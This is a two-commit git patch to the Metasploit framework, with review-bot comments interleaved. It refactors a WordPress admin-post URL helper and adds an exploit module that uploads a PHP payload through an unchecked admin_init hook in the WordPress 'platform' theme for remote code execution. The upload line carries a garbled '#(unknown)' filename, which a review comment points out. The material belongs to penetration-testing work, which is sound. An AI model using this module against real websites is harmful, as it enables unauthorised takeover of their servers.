From 2c956c0a0f66e5dc7f95daaed01022dc320b68fa Mon Sep 17 00:00:00 2001 From: Christian Mehlmauer Date: Sat, 31 Jan 2015 22:02:44 +0100 Subject: [PATCH 1/2] add wordpress platform theme rce --- lib/msf/http/wordpress/uris.rb | 10 +++- .../admin/http/wp_custom_contact_forms.rb | 5 +- .../exploits/unix/webapp/wp_platform_exec.rb | 58 +++++++++++++++++++ .../webapp/wp_wysija_newsletters_upload.rb | 4 +- 4 files changed, 70 insertions(+), 7 deletions(-) create mode 100644 modules/exploits/unix/webapp/wp_platform_exec.rb diff --git a/lib/msf/http/wordpress/uris.rb b/lib/msf/http/wordpress/uris.rb index cd7b3cc166..cad39afb50 100644 --- a/lib/msf/http/wordpress/uris.rb +++ b/lib/msf/http/wordpress/uris.rb @@ -77,9 +77,17 @@ module Msf::HTTP::Wordpress::URIs # # @return [String] Wordpress Admin Ajax URL def wordpress_url_admin_ajax - normalize_uri(target_uri.path, 'wp-admin', 'admin-ajax.php') + normalize_uri(wordpress_url_backend, 'admin-ajax.php') end + # Returns the Wordpress Admin Posts URL + # + # @return [String] Wordpress Admin Post URL + def wordpress_url_admin_post + normalize_uri(wordpress_url_backend, 'admin-post.php') + end + + # Returns the Wordpress wp-content dir URL # # @return [String] Wordpress wp-content dir URL diff --git a/modules/auxiliary/admin/http/wp_custom_contact_forms.rb b/modules/auxiliary/admin/http/wp_custom_contact_forms.rb index 00693ad9f7..75bf278687 100644 --- a/modules/auxiliary/admin/http/wp_custom_contact_forms.rb +++ b/modules/auxiliary/admin/http/wp_custom_contact_forms.rb @@ -43,7 +43,7 @@ class Metasploit3 < Msf::Auxiliary def get_table_prefix res = send_request_cgi({ - 'uri' => normalize_uri(wordpress_url_backend, 'admin-post.php'), + 'uri' => wordpress_url_admin_post, 'method' => 'POST', 'vars_post' => { 'ccf_export' => "1" 
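Review bot: The new `wordpress_url_admin_post` is followed by two added blank lines before `# Returns the Wordpress wp-content dir URL`, which leaves a double blank line between methods where the rest of the hunk uses one. Its doc comment says `Admin Posts URL` while the `@return` tag says `Admin Post URL`; since the helper resolves `admin-post.php`, `Admin Post URL` in both places reads consistently. The `wordpress_url_admin_ajax` change swaps `normalize_uri(target_uri.path, 'wp-admin', 'admin-ajax.php')` for `normalize_uri(wordpress_url_backend, 'admin-ajax.php')`, which is only equivalent if `wordpress_url_backend` resolves to `target_uri.path` plus `wp-admin`; that method is defined outside the hunk, so worth confirming.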
@@ -81,10 +81,9 @@ class Metasploit3 < Msf::Auxiliary post_data = data.to_s print_status("#{peer} - Inserting user #{username} with password #{password}") - uri = normalize_uri(wordpress_url_backend, 'admin-post.php') res = send_request_cgi( 'method' => 'POST', - 'uri' => uri, + 'uri' => wordpress_url_admin_post, 'ctype' => "multipart/form-data; boundary=#{data.bound}", 'data' => post_data ) diff --git a/modules/exploits/unix/webapp/wp_platform_exec.rb b/modules/exploits/unix/webapp/wp_platform_exec.rb new file mode 100644 index 0000000000..bb5269e758 --- /dev/null +++ b/modules/exploits/unix/webapp/wp_platform_exec.rb 
@@ -0,0 +1,58 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+ Rank = ExcellentRanking
+
+ include Msf::HTTP::Wordpress
+
+ def initialize(info = {})
+ super(update_info(
+ info,
+ 'Name' => 'Remote Code Execution in Wordpress Platform Theme',
+ 'Description' => %q{
+ The Wordpress Theme "platform" contains a remote code execution vulnerability
+ through an unchecked admin_init call. The theme includes the uploaded file
+ from it's temp filename with php's include function.
+ },
+ 'Author' =>
+ [
+ 'Marc-Alexandre Montpas', # initial discovery
+ 'Christian Mehlmauer' # metasploit module
+ ],
+ 'License' => MSF_LICENSE,
+ 'References' =>
+ [
+ ['URL', 'http://blog.sucuri.net/2015/01/security-advisory-vulnerabilities-in-pagelinesplatform-theme-for-wordpress.html'],
+ ['WPVDB', '7762']
+ ],
+ 'Privileged' => false,
+ 'Platform' => ['php'],
+ 'Arch' => ARCH_PHP,
+ 'Targets' => [['platform < 1.4.4, platform pro < 1.6.2', {}]],
+ 'DefaultTarget' => 0,
+ 'DisclosureDate' => 'Jan 21 2015'))
+ end
+
+ def exploit
+ filename = "Settings_#{rand_text_alpha(5)}.php"
+
+ data = Rex::MIME::Message.new
+ data.add_part(payload.encoded, 'application/x-php', nil, "form-data; name=\"file\"; filename=\"#(unknown)\"")
+ data.add_part('settings', nil, nil, 'form-data; name="settings_upload"')
+ data.add_part('pagelines', nil, nil, 'form-data; name="page"')
+ post_data = data.to_s
+
+ print_status("#{peer} - Uploading payload")
+ res = send_request_cgi(
+ 'method' => 'POST',
+ 'uri' => wordpress_url_admin_post,
+ 'ctype' => "multipart/form-data; boundary=#{data.bound}",
+ 'data' => post_data
+ )
+ end
+end
diff --git a/modules/exploits/unix/webapp/wp_wysija_newsletters_upload.rb b/modules/exploits/unix/webapp/wp_wysija_newsletters_upload.rb
index 7957fbfc46..3a66c6920b 100644
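Review bot: In `exploit`, the local `filename` is assigned on the method's first line and never referenced again in the hunk, while the disposition of the `payload.encoded` part reads `filename=\"#(unknown)\"`; that looks like a garbled `#{filename}` interpolation, so confirm the upload part actually carries the generated name and not that literal text. `res` is likewise assigned and never inspected, so a rejected upload (an error status, or no reply at all) ends the module without any message; the second patch in this series drops the assignment but still discards the reply. Minor wording in the description: `from it's temp filename` should be `from its temp filename`.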
--- a/modules/exploits/unix/webapp/wp_wysija_newsletters_upload.rb +++ b/modules/exploits/unix/webapp/wp_wysija_newsletters_upload.rb @@ -78,8 +78,6 @@ class Metasploit3 < Msf::Exploit::Remote zip_content = create_zip_file(theme_name, payload_name) - uri = normalize_uri(wordpress_url_backend, 'admin-post.php') - data = Rex::MIME::Message.new data.add_part(zip_content, 'application/x-zip-compressed', 'binary', "form-data; name=\"my-theme\"; filename=\"#{rand_text_alpha(5)}.zip\"") data.add_part('on', nil, nil, 'form-data; name="overwriteexistingtheme"') @@ -94,7 +92,7 @@ class Metasploit3 < Msf::Exploit::Remote print_status("#{peer} - Uploading payload to #{payload_uri}") res = send_request_cgi( 'method' => 'POST', - 'uri' => uri, + 'uri' => wordpress_url_admin_post, 'ctype' => "multipart/form-data; boundary=#{data.bound}", 'vars_get' => { 'page' => 'wysija_campaigns', 'action' => 'themes' }, 'data' => post_data From 28f303d43116cd3546417df62b887d75563aba14 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Tue, 3 Feb 2015 17:33:29 -0600 Subject: [PATCH 2/2] Decrease timeout --- modules/exploits/unix/webapp/wp_platform_exec.rb | 10 +++++----- 1 file changed, 5 insertions(+), 5 deletions(-) diff --git a/modules/exploits/unix/webapp/wp_platform_exec.rb b/modules/exploits/unix/webapp/wp_platform_exec.rb index bb5269e758..29143dd3f4 100644 --- a/modules/exploits/unix/webapp/wp_platform_exec.rb +++ b/modules/exploits/unix/webapp/wp_platform_exec.rb 
@@ -15,9 +15,9 @@ class Metasploit3 < Msf::Exploit::Remote info, 'Name' => 'Remote Code Execution in Wordpress Platform Theme', 'Description' => %q{ - The Wordpress Theme "platform" contains a remote code execution vulnerability - through an unchecked admin_init call. The theme includes the uploaded file - from it's temp filename with php's include function. + The Wordpress Theme "platform" contains a remote code execution vulnerability + through an unchecked admin_init call. The theme includes the uploaded file + from it's temp filename with php's include function. }, 'Author' => [ @@ -48,11 +48,11 @@ class Metasploit3 < Msf::Exploit::Remote post_data = data.to_s print_status("#{peer} - Uploading payload") - res = send_request_cgi( + send_request_cgi({ 'method' => 'POST', 'uri' => wordpress_url_admin_post, 'ctype' => "multipart/form-data; boundary=#{data.bound}", 'data' => post_data - ) + }, 5) end end
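Review bot: The new `send_request_cgi({ ... }, 5)` leaves the reply unchecked and the timeout as a bare literal; the commit title says only "Decrease timeout", and the reason a reply is presumably not expected (the request being held open once the uploaded file is included) is nowhere in the code, so a one-line comment on the value would spare the next reader a git blame. Keeping the result and reporting an error status would also make a blocked upload visible instead of a silent return: `res = send_request_cgi({ ... }, 5)` followed by `print_error("#{peer} - Unexpected reply: #{res.code}") if res && res.code != 200` (adjust the expected code if a different status signals acceptance). The enclosing `exploit` method starts outside this hunk.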